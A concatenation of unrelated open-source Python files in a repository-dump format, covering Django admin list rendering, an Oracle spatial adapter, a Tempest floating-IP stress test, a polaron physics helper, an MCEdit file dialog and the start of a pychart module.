"class_attrib": format_html(' class="{}"', ' '.join(th_classes)) if th_classes else '',
}
def _boolean_icon(field_val):
icon_url = static('admin/img/icon-%s.svg' %
{True: 'yes', False: 'no', None: 'unknown'}[field_val])
return format_html('<img src="{}" alt="{}" />', icon_url, field_val)
def _coerce_field_name(field_name, field_index):
"""
Coerce a field_name (which may be a callable) to a string.
"""
if callable(field_name):
if field_name.__name__ == '<lambda>':
return 'lambda' + str(field_index)
else:
return field_name.__name__
return field_name
def items_for_result(cl, result, form):
"""
Generates the actual list of data.
"""
def link_in_col(is_first, field_name, cl):
if cl.list_display_links is None:
return False
if is_first and not cl.list_display_links:
return True
return field_name in cl.list_display_links
first = True
pk = cl.lookup_opts.pk.attname
for field_index, field_name in enumerate(cl.list_display):
empty_value_display = cl.model_admin.get_empty_value_display()
row_classes = ['field-%s' % _coerce_field_name(field_name, field_index)]
try:
f, attr, value = lookup_field(field_name, result, cl.model_admin)
except ObjectDoesNotExist:
result_repr = empty_value_display
else:
empty_value_display = getattr(attr, 'empty_value_display', empty_value_display)
if f is None or f.auto_created:
if field_name == 'action_checkbox':
row_classes = ['action-checkbox']
allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
result_repr = display_for_value(value, empty_value_display, boolean)
if allow_tags:
warnings.warn(
"Deprecated allow_tags attribute used on field {}. "
"Use django.utils.safestring.format_html(), "
"format_html_join(), or mark_safe() instead.".format(field_name),
RemovedInDjango20Warning
)
result_repr = mark_safe(result_repr)
if isinstance(value, (datetime.date, datetime.time)):
row_classes.append('nowrap')
else:
if isinstance(f.remote_field, models.ManyToOneRel):
field_val = getattr(result, f.name)
if field_val is None:
result_repr = empty_value_display
else:
result_repr = field_val
else:
result_repr = display_for_field(value, f, empty_value_display)
if isinstance(f, (models.DateField, models.TimeField, models.ForeignKey)):
row_classes.append('nowrap')
if force_text(result_repr) == '':
result_repr = mark_safe(' ')
row_class = mark_safe(' class="%s"' % ' '.join(row_classes))
# If list_display_links not defined, add the link tag to the first field
if link_in_col(first, field_name, cl):
table_tag = 'th' if first else 'td'
first = False
# Display link to the result's change_view if the url exists, else
# display just the result's representation.
try:
url = cl.url_for_result(result)
except NoReverseMatch:
link_or_text = result_repr
else:
url = add_preserved_filters({'preserved_filters': cl.preserved_filters, 'opts': cl.opts}, url)
# Convert the pk to something that can be used in Javascript.
# Problem cases are long ints (23L) and non-ASCII strings.
if cl.to_field:
attr = str(cl.to_field)
else:
attr = pk
value = result.serializable_value(attr)
link_or_text = format_html(
'<a href="{}"{}>{}</a>',
url,
format_html(
' data-popup-opener="{}"', value
) if cl.is_popup else '',
result_repr)
yield format_html('<{}{}>{}</{}>',
table_tag,
row_class,
link_or_text,
table_tag)
else:
# By default the fields come from ModelAdmin.list_editable, but if we pull
# the fields out of the form instead of list_editable custom admins
# can provide fields on a per request basis
if (form and field_name in form.fields and not (
field_name == cl.model._meta.pk.name and
form[cl.model._meta.pk.name].is_hidden)):
bf = form[field_name]
result_repr = mark_safe(force_text(bf.errors) + force_text(bf))
yield format_html('<td{}>{}</td>', row_class, result_repr)
if form and not form[cl.model._meta.pk.name].is_hidden:
yield format_html('<td>{}</td>', force_text(form[cl.model._meta.pk.name]))
class ResultList(list):
# Wrapper class used to return items in a list_editable
# changelist, annotated with the form object for error
# reporting purposes. Needed to maintain backwards
# compatibility with existing admin templates.
def __init__(self, form, *items):
self.form = form
super(ResultList, self).__init__(*items)
def results(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
yield ResultList(form, items_for_result(cl, res, form))
else:
for res in cl.result_list:
yield ResultList(None, items_for_result(cl, res, None))
def result_hidden_fields(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
if form[cl.model._meta.pk.name].is_hidden:
yield mark_safe(force_text(form[cl.model._meta.pk.name]))
@register.inclusion_tag("admin/change_list_results.html")
def result_list(cl):
"""
Displays the headers and data list together
"""
headers = list(result_headers(cl))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
return {'cl': cl,
'result_hidden_fields': list(result_hidden_fields(cl)),
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(cl))}
@register.inclusion_tag('admin/date_hierarchy.html')
def date_hierarchy(cl):
"""
Displays the date hierarchy for date drill-down functionality.
"""
if cl.date_hierarchy:
field_name = cl.date_hierarchy
field = cl.opts.get_field(field_name)
dates_or_datetimes = 'datetimes' if isinstance(field, models.DateTimeField) else 'dates'
year_field = '%s__year' % field_name
month_field = '%s__month' % field_name
day_field = '%s__day' % field_name
field_generic = '%s__' % field_name
year_lookup = cl.params.get(year_field)
month_lookup = cl.params.get(month_field)
day_lookup = cl.params.get(day_field)
def link(filters):
return cl.get_query_string(filters, [field_generic])
if not (year_lookup or month_lookup or day_lookup):
# select appropriate start level
date_range = cl.queryset.aggregate(first=models.Min(field_name),
last=models.Max(field_name))
if date_range['first'] and date_range['last']:
if date_range['first'].year == date_range['last'].year:
year_lookup = date_range['first'].year
if date_range['first'].month == date_range['last'].month:
month_lookup = date_range['first'].month
if year_lookup and month_lookup and day_lookup:
day = datetime.date(int(year_lookup), int(month_lookup), int(day_lookup))
return {
'show': True,
'back': {
'link': link({year_field: year_lookup, month_field: month_lookup}),
'title': capfirst(formats.date_format(day, 'YEAR_MONTH_FORMAT'))
},
'choices': [{'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))}]
}
elif year_lookup and month_lookup:
days = cl.queryset.filter(**{year_field: year_lookup, month_field: month_lookup})
days = getattr(days, dates_or_datetimes)(field_name, 'day')
return {
'show': True,
'back': {
'link': link({year_field: year_lookup}),
'title': str(year_lookup)
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month_lookup, day_field: day.day}),
'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))
} for day in days]
}
elif year_lookup:
months = cl.queryset.filter(**{year_field: year_lookup})
months = getattr(months, dates_or_datetimes)(field_name, 'month')
return {
'show': True,
'back': {
'link': link({}),
'title': _('All dates')
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month.month}),
'title': capfirst(formats.date_format(month, 'YEAR_MONTH_FORMAT'))
} for month in months]
}
else:
years = getattr(cl.queryset, dates_or_datetimes)(field_name, 'year')
return {
'show': True,
'choices': [{
'link': link({year_field: str(year.year)}),
'title': str(year.year),
} for year in years]
}
@register.inclusion_tag('admin/search_form.html')
def search_form(cl):
"""
Displays a search form for searching the list.
"""
return {
'cl': cl,
'show_result_count': cl.result_count != cl.full_result_count,
'search_var': SEARCH_VAR
}
@register.simple_tag
def admin_list_filter(cl, spec):
tpl = get_template(spec.template)
return tpl.render({
'title': spec.title,
'choices': list(spec.choices(cl)),
'spec': spec,
})
@register.inclusion_tag('admin/actions.html', takes_context=True)
def admin_actions(context):
"""
Track the number of times the action field has been rendered on the page,
so we know which value to use.
"""
context['action_index'] = context.get('action_index', -1) + 1
return context
|
dracos/django
|
refs/heads/master
|
django/contrib/gis/db/backends/oracle/adapter.py
|
91
|
from cx_Oracle import CLOB
from django.contrib.gis.db.backends.base.adapter import WKTAdapter
from django.contrib.gis.geos import GeometryCollection, Polygon
class OracleSpatialAdapter(WKTAdapter):
input_size = CLOB
def __init__(self, geom):
"""
Oracle requires that polygon rings are in proper orientation. This
affects spatial operations and an invalid orientation may cause
failures. Correct orientations are:
* Outer ring - counter clockwise
* Inner ring(s) - clockwise
"""
if isinstance(geom, Polygon):
self._fix_polygon(geom)
elif isinstance(geom, GeometryCollection):
self._fix_geometry_collection(geom)
self.wkt = geom.wkt
self.srid = geom.srid
def _fix_polygon(self, poly):
"""Fix single polygon orientation as described in __init__()."""
if self._isClockwise(poly.exterior_ring):
poly.exterior_ring = list(reversed(poly.exterior_ring))
for i in range(1, len(poly)):
if not self._isClockwise(poly[i]):
poly[i] = list(reversed(poly[i]))
return poly
def _fix_geometry_collection(self, coll):
"""
Fix polygon orientations in geometry collections as described in
__init__().
"""
for i, geom in enumerate(coll):
if isinstance(geom, Polygon):
coll[i] = self._fix_polygon(geom)
def _isClockwise(self, coords):
"""
A modified shoelace algorithm to determine polygon orientation.
See https://en.wikipedia.org/wiki/Shoelace_formula.
"""
n = len(coords)
area = 0.0
for i in range(n):
j = (i + 1) % n
area += coords[i][0] * coords[j][1]
area -= coords[j][0] * coords[i][1]
return area < 0.0
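# Sanity check of the shoelace test above: for the counter-clockwise unit
# square [(0, 0), (1, 0), (1, 1), (0, 1)] the signed sum is +2, so
# _isClockwise() returns False and the exterior ring is left untouched.
# Usage sketch (requires GEOS):
#   OracleSpatialAdapter(Polygon(((0, 0), (1, 0), (1, 1), (0, 1), (0, 0))))
# normalizes ring orientation on construction and exposes .wkt/.srid.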
|
ghandiosm/Test
|
refs/heads/master
|
addons/hr_timesheet_sheet/report/__init__.py
|
46
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import hr_timesheet_report
|
pwong-mapr/private-hue
|
refs/heads/HUE-1096-abe
|
desktop/core/ext-py/Django-1.4.5/tests/regressiontests/urlpatterns_reverse/middleware.py
|
92
|
from __future__ import absolute_import
from . import urlconf_inner
class ChangeURLconfMiddleware(object):
def process_request(self, request):
request.urlconf = urlconf_inner.__name__
class NullChangeURLconfMiddleware(object):
def process_request(self, request):
request.urlconf = None
|
danielmellado/tempest
|
refs/heads/master
|
tempest/stress/actions/ssh_floating.py
|
6
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import subprocess
from tempest_lib.common.utils import data_utils
from tempest import config
import tempest.stress.stressaction as stressaction
import tempest.test
CONF = config.CONF
class FloatingStress(stressaction.StressAction):
# from the scenario manager
def ping_ip_address(self, ip_address):
cmd = ['ping', '-c1', '-w1', ip_address]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
success = proc.returncode == 0
return success
def tcp_connect_scan(self, addr, port):
# like tcp
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((addr, port))
except socket.error as exc:
self.logger.info("%s(%s): %s", self.server_id, self.floating['ip'],
str(exc))
return False
self.logger.info("%s(%s): Connected :)", self.server_id,
self.floating['ip'])
s.close()
return True
def check_port_ssh(self):
def func():
return self.tcp_connect_scan(self.floating['ip'], 22)
if not tempest.test.call_until_true(func, self.check_timeout,
self.check_interval):
raise RuntimeError("Cannot connect to the ssh port.")
def check_icmp_echo(self):
self.logger.info("%s(%s): Pinging..",
self.server_id, self.floating['ip'])
def func():
return self.ping_ip_address(self.floating['ip'])
if not tempest.test.call_until_true(func, self.check_timeout,
self.check_interval):
raise RuntimeError("%s(%s): Cannot ping the machine.",
self.server_id, self.floating['ip'])
self.logger.info("%s(%s): pong :)",
self.server_id, self.floating['ip'])
def _create_vm(self):
self.name = name = data_utils.rand_name("instance")
servers_client = self.manager.servers_client
self.logger.info("creating %s" % name)
vm_args = self.vm_extra_args.copy()
vm_args['security_groups'] = [self.sec_grp]
server = servers_client.create_server(name, self.image,
self.flavor,
**vm_args)
self.server_id = server['id']
if self.wait_after_vm_create:
self.manager.servers_client.wait_for_server_status(self.server_id,
'ACTIVE')
def _destroy_vm(self):
self.logger.info("deleting %s" % self.server_id)
self.manager.servers_client.delete_server(self.server_id)
self.manager.servers_client.wait_for_server_termination(self.server_id)
self.logger.info("deleted %s" % self.server_id)
def _create_sec_group(self):
sec_grp_cli = self.manager.security_groups_client
s_name = data_utils.rand_name('sec_grp-')
s_description = data_utils.rand_name('desc-')
self.sec_grp = sec_grp_cli.create_security_group(s_name,
s_description)
create_rule = sec_grp_cli.create_security_group_rule
create_rule(self.sec_grp['id'], 'tcp', 22, 22)
create_rule(self.sec_grp['id'], 'icmp', -1, -1)
def _destroy_sec_grp(self):
sec_grp_cli = self.manager.security_groups_client
sec_grp_cli.delete_security_group(self.sec_grp['id'])
def _create_floating_ip(self):
floating_cli = self.manager.floating_ips_client
self.floating = floating_cli.create_floating_ip(self.floating_pool)
def _destroy_floating_ip(self):
cli = self.manager.floating_ips_client
cli.delete_floating_ip(self.floating['id'])
cli.wait_for_resource_deletion(self.floating['id'])
self.logger.info("Deleted Floating IP %s", str(self.floating['ip']))
def setUp(self, **kwargs):
self.image = CONF.compute.image_ref
self.flavor = CONF.compute.flavor_ref
self.vm_extra_args = kwargs.get('vm_extra_args', {})
self.wait_after_vm_create = kwargs.get('wait_after_vm_create',
True)
self.new_vm = kwargs.get('new_vm', False)
self.new_sec_grp = kwargs.get('new_sec_group', False)
self.new_floating = kwargs.get('new_floating', False)
self.reboot = kwargs.get('reboot', False)
self.floating_pool = kwargs.get('floating_pool', None)
self.verify = kwargs.get('verify', ('check_port_ssh',
'check_icmp_echo'))
self.check_timeout = kwargs.get('check_timeout', 120)
self.check_interval = kwargs.get('check_interval', 1)
self.wait_for_disassociate = kwargs.get('wait_for_disassociate',
True)
# allocate floating
if not self.new_floating:
self._create_floating_ip()
# add security group
if not self.new_sec_grp:
self._create_sec_group()
# create vm
if not self.new_vm:
self._create_vm()
def wait_disassociate(self):
cli = self.manager.floating_ips_client
def func():
floating = cli.get_floating_ip_details(self.floating['id'])
return floating['instance_id'] is None
if not tempest.test.call_until_true(func, self.check_timeout,
self.check_interval):
raise RuntimeError("IP disassociate timeout!")
def run_core(self):
cli = self.manager.floating_ips_client
cli.associate_floating_ip_to_server(self.floating['ip'],
self.server_id)
for method in self.verify:
m = getattr(self, method)
m()
cli.disassociate_floating_ip_from_server(self.floating['ip'],
self.server_id)
if self.wait_for_disassociate:
self.wait_disassociate()
def run(self):
if self.new_sec_grp:
self._create_sec_group()
if self.new_floating:
self._create_floating_ip()
if self.new_vm:
self._create_vm()
if self.reboot:
self.manager.servers_client.reboot(self.server_id, 'HARD')
self.manager.servers_client.wait_for_server_status(self.server_id,
'ACTIVE')
self.run_core()
if self.new_vm:
self._destroy_vm()
if self.new_floating:
self._destroy_floating_ip()
if self.new_sec_grp:
self._destroy_sec_grp()
def tearDown(self):
if not self.new_vm:
self._destroy_vm()
if not self.new_floating:
self._destroy_floating_ip()
if not self.new_sec_grp:
self._destroy_sec_grp()
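# Illustrative stress-job entry wiring this action into the tempest stress
# runner (shaped like the sample JSON jobs shipped with tempest; the values
# here are hypothetical):
# [{"action": "tempest.stress.actions.ssh_floating.FloatingStress",
#   "threads": 1,
#   "kwargs": {"new_vm": true, "verify": ["check_icmp_echo"],
#              "check_timeout": 120}}]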
|
VariationalResearch/Polaron
|
refs/heads/master
|
polrabi/wf2.py
|
1
|
from . basic import *
# NOTE: FORGOT TO MULTIPLY BY dk IN INTEGRALS FOR SECONDWF CALCULATIONS
# ALSO, WK**-1 IS WRONG APPARENTLY -> NEED TO DO 1/WK
def pchi(betaVec, kVec, gBB, mB, n0):
# takes finite vector of Beta_{k} values and returns (1/2)*Sum_{k}[W_{k}*(Beta_{k}+Beta_{k}^{*})]
betaSum = betaVec + np.conjugate(betaVec)
return (1 / 2) * (4 * np.pi / (2 * np.pi)**3) * np.dot(Wk(kVec, gBB, mB, n0), betaSum * kVec**2)
def mchi(betaVec, kVec, gBB, mB, n0):
# takes finite vector of Beta_{k} values and returns (1/2)*Sum_{k}[W_{k}^{-1}*(Beta_{k}-Beta_{k}^{*})]
betaDiff = betaVec - np.conjugate(betaVec)
return (1 / 2) * (4 * np.pi / (2 * np.pi)**3) * np.dot(Wk(kVec, gBB, mB, n0)**(-1), betaDiff * kVec**2)
# def omega_k(P, PB, k, gBB, mI, mB, n0):
# return w(k, gBB, mB, n0) + (k**2 / (2 * mI)) - (k / mI) * (P - PB)
def omega0_k(k, gBB, mI, mB, n0):
return w(k, gBB, mB, n0) + (k**2 / (2 * mI))
def g(aIBi, kcutoff, gBB, mI, mB, n0):
# assuming finite vector of k values, gives interaction strength constant
# divSum = (4 * np.pi / (2 * np.pi)**3) * sum((kVec**2) * (Wk(kVec, gBB, mB, n0)**2) / omega_k(P, PB, kVec, gBB, mI, mB, n0))
return 1 / ((ur(mI, mB) / (2 * np.pi)) * aIBi - (ur(mI, mB) / np.pi**2) * kcutoff)
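# Smoke test of g() under toy values (units as defined in basic.py; this
# assumes ur() is the reduced mass mI*mB/(mI+mB)), so the expression is
#   g = 1 / ((ur/(2*pi)) * aIBi - (ur/pi**2) * kcutoff)
# e.g.: print(g(aIBi=1.0, kcutoff=10.0, gBB=0.05, mI=1.0, mB=1.0, n0=1.0))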
|
gpmidi/MCEdit-Unified
|
refs/heads/master
|
albow/file_dialogs.py
|
3
|
# -*- coding: utf-8 -*-
#
# Albow - File Dialogs
#
#-# Modified by D.C.-G. for translation purpose
"""
TODO:
* Implement Windows support.
"""
import os, sys
from pygame import event, image
from pygame.transform import scale
from pygame.locals import *
from albow.widget import Widget
from albow.dialogs import Dialog, ask, alert
from albow.controls import Label, Button, Image
from albow.fields import TextFieldWrapped
from albow.layout import Row, Column
from albow.palette_view import PaletteView
from albow.scrollpanel import ScrollPanel
from albow.theme import ThemeProperty
from translate import _
from tree import Tree
import logging
log = logging.getLogger(__name__)
if sys.platform in ('darwin', 'linux2'):
print "*** MCEDIT DEBUG: file_dialog:", __file__
print "*** MCEDIT DEBUG: directory:", os.path.dirname(__file__)
print "*** MCEDIT DEBUG: current directory:", os.getcwd()
try:
file_image = image.load('file.png')
folder_image = image.load('folder.png')
except Exception, e:
print "MCEDIT DEBUG: Could not load file dialog images."
print e
from pygame import draw, Surface
from pygame.locals import SRCALPHA
from math import pi
file_image = Surface((16, 16), SRCALPHA)
file_image.fill((0,0,0,0))
draw.lines(file_image, (255, 255, 255, 255), False, [[3, 15], [3, 1], [13, 1]], 2)
draw.line(file_image, (255, 255, 255, 255), [3, 7], [10, 7], 2)
folder_image = Surface((16, 16), SRCALPHA)
folder_image.fill((0,0,0,0))
draw.line(folder_image, (255, 255, 255, 255), [3, 15], [3, 1], 2)
draw.arc(folder_image, (255, 255, 255, 255), [0, 1, 13, 15], 0, pi/1.9, 2)
draw.arc(folder_image, (255, 255, 255, 255), [0, 1, 13, 15], 3*pi/2, 2*pi, 2)
else: # windows
file_image = image.load('file.png')
folder_image = image.load('folder.png')
class DirPathView(Widget):
def __init__(self, width, client, **kwds):
Widget.__init__(self, **kwds)
self.set_size_for_text(width)
self.client = client
def draw(self, surf):
frame = self.get_margin_rect()
image = self.font.render(self.client.directory, True, self.fg_color)
tw = image.get_width()
mw = frame.width
if tw <= mw:
x = 0
else:
x = mw - tw
surf.blit(image, (frame.left + x, frame.top))
class FileListView(ScrollPanel):
def __init__(self, width, client, **kwds):
font = self.predict_font(kwds)
h = font.get_linesize()
d = 2 * self.predict(kwds, 'margin')
kwds['align'] = kwds.get('align', 'l')
ScrollPanel.__init__(self, inner_width=width, **kwds)
self.icons = {True: scale(folder_image, (self.row_height, self.row_height)), False: scale(file_image, (self.row_height, self.row_height))}
self.client = client
self.names = []
def update(self):
client = self.client
dir = client.directory
def filter(name):
path = os.path.join(dir, name)
return os.path.isdir(path) or self.client.filter(path)
try:
content = os.walk(dir)
for a, dirnames, filenames in content:
dirnames.sort()
filenames.sort()
break
try:
self.names = [unicode(name, 'utf-8') for name in dirnames + filenames if filter(name)]
except:
self.names = [name for name in dirnames + filenames if filter(name)]
except EnvironmentError, e:
alert(u"%s: %s" % (dir, e))
self.names = []
self.rows = [Row([Image(self.icons[os.path.isdir(os.path.join(dir, a))]),
Label(a, margin=0)], margin=0, spacing=2) for a in self.names]
self.selected_item_index = None
self.scroll_to_item(0)
def scroll_to_item(self, *args, **kwargs):
self.scrollRow.scroll_to_item(*args, **kwargs)
def num_items(self):
return len(self.names)
def click_item(self, item_no, e):
self.selected_item_index = item_no
ScrollPanel.click_item(self, item_no, e)
if e.num_clicks == 2:
self.client.dir_box_click(True)
def item_is_selected(self, item_no):
return item_no == self.selected_item_index
def get_selected_name(self):
sel = self.selected_item_index
if sel is not None:
return self.names[sel]
else:
return ""
def get_platform_root_dir():
#-# Rework this in order to mimic the OSs file chooser behaviour.
#-# Need platform/version specific code...
return '/'
class FSTree(Tree):
def __init__(self, client, *args, **kwargs):
kwargs['draw_zebra'] = False
self.client = client
self.directory = get_platform_root_dir()
self.content = content = os.walk(self.directory)
if client is not None and hasattr(client, 'directory'):
self.directory = client.directory
self.directory = kwargs.pop('directory', self.directory)
self.data = data = {}
d = {}
for dirpath, dirnames, filenames in content:
for name in dirnames:
d[name] = self.parse_path(name, os.path.join(dirpath, name))
data[dirpath] = d
break
kwargs['data'] = data
Tree.__init__(self, *args, **kwargs)
del self.menu
self.set_directory(self.directory)
def show_menu(self, *args, **kwargs):
return
def set_directory(self, directory):
        self.directory = directory
self.deployed = []
splitted_path = directory.split(os.sep)
while '' in splitted_path:
splitted_path.remove('')
splitted_path.insert(0, '/')
d = self.data
path = ""
while splitted_path:
name = splitted_path.pop(0)
path = os.path.join(path, name)
d[name] = self.parse_path(name, path)
rows = self.build_layout()
i = 0
for row in rows:
if row[3] == name and self.get_item_path(row) in directory:
self.deployed.append(row[6])
self.clicked_item = row
rows[i + 1:] = self.build_layout()[i + 1:]
if directory == self.get_item_path(row):
self.treeRow.scroll_to_item(rows.index(row))
self.selected_item_index = rows.index(row)
self.selected_item = row
break
i += 1
d = d[name]
def parse_path(self, name, path):
#!# The log.debug() and print stuff in there are intended to fix some OSX issues.
#!# Please do not strip them out. -- D.C.-G.
# log.debug('FSTree.parse_path')
# log.debug(' path: %s\n length: %d'%(repr(path), len(path)))
# print ' path: %s\n length: %d'%(repr(path), len(path))
# log.debug(' path: %s\n length: %d'%(repr(path), len(path)))
# if len(path) < 1: print ' ! ! ! ^ ^ ^ ! ! !'
# if len(path) < 1: log.debug(' ! ! ! ^ ^ ^ ! ! !')
content = os.walk(path)
data = {}
d = data
for a, folders, b in content:
# log.debug(' a: %s\n length: %d'%(repr(a), len(a)))
# print ' a: %s\n length: %d'%(repr(a), len(a))
# log.debug(' a: %s\n length: %d'%(repr(a), len(a)))
# if len(a) < 1: print ' ! ! ! ^ ^ ^ ! ! !'
# if len(a) < 1: log.debug(' ! ! ! ^ ^ ^ ! ! !')
d = {}
for folder in folders:
# log.debug(' folder: %s\n length: %d'%(repr(folder), len(folder)))
# print ' folder: %s\n length: %d'%(repr(folder), len(folder))
# log.debug(' folder: %s\n length: %d'%(repr(folder), len(folder)))
# if len(folder) < 1: print ' ! ! ! ^ ^ ^ ! ! !'
# if len(folder) < 1: log.debug(' ! ! ! ^ ^ ^ ! ! !')
if type(folder) == str:
folder = unicode(folder, 'utf-8')
d[folder] = {}
if type(a) == str:
a = unicode(a,'utf-8')
cont = os.walk(os.path.join(a, folder))
for _a, fs, _b in cont:
for f in fs:
# log.debug(' f: %s\n length: %d'%(repr(f), len(f)))
# print ' f: %s\n length: %d'%(repr(f), len(f))
# log.debug(' f: %s\n length: %d'%(repr(f), len(f)))
# if len(f) < 1: print ' ! ! ! ^ ^ ^ ! ! !'
# if len(f) < 1: log.debug(' ! ! ! ^ ^ ^ ! ! !')
if type(f) == str:
d[folder][unicode(f, 'utf-8')] = {}
else:
d[folder][f] = {}
break
break
return d
def get_item_path(self, item):
path_list = []
if item is not None:
id = item[6]
parents = [item]
while id != 1:
item = self.get_item_parent(parents[-1])
if item is None:
break
id = item[6]
parents.append(item)
parents.reverse()
path_list = [a[3] for a in parents]
path = '/'
for name in path_list:
path = os.path.join(path, name)
return path
def deploy(self, id):
path = self.get_item_path(self.clicked_item)
self.clicked_item[9] = self.parse_path(self.clicked_item[3], path)
Tree.deploy(self, id)
def select_item(self, n):
Tree.select_item(self, n)
self.client.directory = self.get_item_path(self.selected_item)
class FileDialog(Dialog):
box_width = 450
default_prompt = None
up_button_text = ThemeProperty("up_button_text")
def __init__(self, prompt=None, suffixes=None, **kwds):
Dialog.__init__(self, **kwds)
label = None
d = self.margin
self.suffixes = suffixes or ("",)
up_button = Button(self.up_button_text, action=self.go_up)
dir_box = DirPathView(self.box_width + 250, self)
self.dir_box = dir_box
top_row = Row([dir_box, up_button])
list_box = FileListView(self.box_width - 16, self)
self.list_box = list_box
tree = FSTree(self, inner_width=250, directory='/')
self.tree = tree
row = Row((tree, list_box), margin=0)
ctrls = [top_row, row]
prompt = prompt or self.default_prompt
if prompt:
label = Label(prompt)
if self.saving:
filename_box = TextFieldWrapped(self.box_width)
filename_box.change_action = self.update_filename
filename_box._enter_action = filename_box.enter_action
filename_box.enter_action = self.enter_action
self.filename_box = filename_box
ctrls.append(Column([label, filename_box], align='l', spacing=0))
else:
if label:
ctrls.insert(0, label)
ok_button = Button(self.ok_label, action=self.ok, enable=self.ok_enable)
self.ok_button = ok_button
cancel_button = Button("Cancel", action=self.cancel)
vbox = Column(ctrls, align='l', spacing=d)
vbox.topleft = (d, d)
y = vbox.bottom + d
ok_button.topleft = (vbox.left, y)
cancel_button.topright = (vbox.right, y)
self.add(vbox)
self.add(ok_button)
self.add(cancel_button)
self.shrink_wrap()
self._directory = None
self.directory = os.getcwdu()
#print "FileDialog: cwd =", repr(self.directory) ###
if self.saving:
filename_box.focus()
def get_directory(self):
return self._directory
def set_directory(self, x):
x = os.path.abspath(x)
while not os.path.exists(x):
y = os.path.dirname(x)
if y == x:
x = os.getcwdu()
break
x = y
if self._directory != x:
self._directory = x
self.list_box.update()
self.update()
directory = property(get_directory, set_directory)
def filter(self, path):
suffixes = self.suffixes
if not suffixes or os.path.isdir(path):
#return os.path.isfile(path)
return True
for suffix in suffixes:
if path.endswith(suffix.lower()):
return True
def update(self):
self.tree.set_directory(self.directory)
def update_filename(self):
if self.filename_box.text in self.list_box.names:
self.directory = os.path.join(self.directory, self.filename_box.text)
def go_up(self):
self.directory = os.path.dirname(self.directory)
self.list_box.scroll_to_item(0)
def dir_box_click(self, double):
if double:
name = self.list_box.get_selected_name()
path = os.path.join(self.directory, name)
suffix = os.path.splitext(name)[1]
if suffix not in self.suffixes and os.path.isdir(path):
self.directory = path
else:
self.double_click_file(name)
self.update()
def enter_action(self):
self.filename_box._enter_action()
self.ok()
def ok(self):
self.dir_box_click(True)
#self.dismiss(True)
def cancel(self):
self.dismiss(False)
def key_down(self, evt):
k = evt.key
if k == K_RETURN or k == K_KP_ENTER:
self.dir_box_click(True)
if k == K_ESCAPE:
self.cancel()
class FileSaveDialog(FileDialog):
saving = True
default_prompt = "Save as:"
ok_label = "Save"
def get_filename(self):
return self.filename_box.text
def set_filename(self, x):
dsuf = self.suffixes[0]
if dsuf and x.endswith(dsuf):
x = x[:-len(dsuf)]
self.filename_box.text = x
filename = property(get_filename, set_filename)
def get_pathname(self):
path = os.path.join(self.directory, self.filename_box.text)
suffixes = self.suffixes
if suffixes and not path.endswith(suffixes[0]):
path = path + suffixes[0]
return path
pathname = property(get_pathname)
def double_click_file(self, name):
self.filename_box.text = name
def ok(self):
path = self.pathname
if os.path.exists(path):
answer = ask(_("Replace existing '%s'?") % os.path.basename(path))
if answer != "OK":
return
#FileDialog.ok(self)
self.dismiss(True)
def update(self):
FileDialog.update(self)
def ok_enable(self):
return self.filename_box.text != ""
class FileOpenDialog(FileDialog):
saving = False
ok_label = "Open"
def get_pathname(self):
name = self.list_box.get_selected_name()
if name:
return os.path.join(self.directory, name)
else:
return None
pathname = property(get_pathname)
#def update(self):
# FileDialog.update(self)
def ok_enable(self):
path = self.pathname
enabled = self.item_is_choosable(path)
return enabled
def item_is_choosable(self, path):
return bool(path) and self.filter(path)
def double_click_file(self, name):
self.dismiss(True)
class LookForFileDialog(FileOpenDialog):
target = None
def __init__(self, target, **kwds):
FileOpenDialog.__init__(self, **kwds)
self.target = target
def item_is_choosable(self, path):
return path and os.path.basename(path) == self.target
def filter(self, name):
return name and os.path.basename(name) == self.target
def request_new_filename(prompt=None, suffix=None, extra_suffixes=None,
directory=None, filename=None, pathname=None):
if pathname:
directory, filename = os.path.split(pathname)
if extra_suffixes:
suffixes = extra_suffixes
else:
suffixes = []
if suffix:
suffixes = [suffix] + suffixes
dlog = FileSaveDialog(prompt=prompt, suffixes=suffixes)
if directory:
dlog.directory = directory
if filename:
dlog.filename = filename
if dlog.present():
return dlog.pathname
else:
return None
def request_old_filename(suffixes=None, directory=None):
dlog = FileOpenDialog(suffixes=suffixes)
if directory:
dlog.directory = directory
if dlog.present():
return dlog.pathname
else:
return None
def look_for_file_or_directory(target, prompt=None, directory=None):
dlog = LookForFileDialog(target=target, prompt=prompt)
if directory:
dlog.directory = directory
if dlog.present():
return dlog.pathname
else:
return None
|
Johnzero/erp
|
refs/heads/fga
|
openerp/pychart/line_style.py
|
15
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2000-2005 by Yasushi Saito (yasushi.saito@gmail.com)
#
# Jockey is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2, or (at your option) any
# later version.
#
# Jockey is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
import color
import pychart_util
import chart_object
import object_set
import theme
import line_style_doc
from pychart_types import *
from types import *
_keys = {
"width" : (UnitType, theme.default_line_width, "Width of the line, in points."),
"color": (color.T, color.default, "The color of the line."),
"dash" : (TupleType, None,
"""The value
of None will draw a solid line. Otherwise, this
attribute specifies the style of dashed lines.
The 2N'th value specifies the length of the line (in points),
and 2N+1'th value specifies the length of the blank.
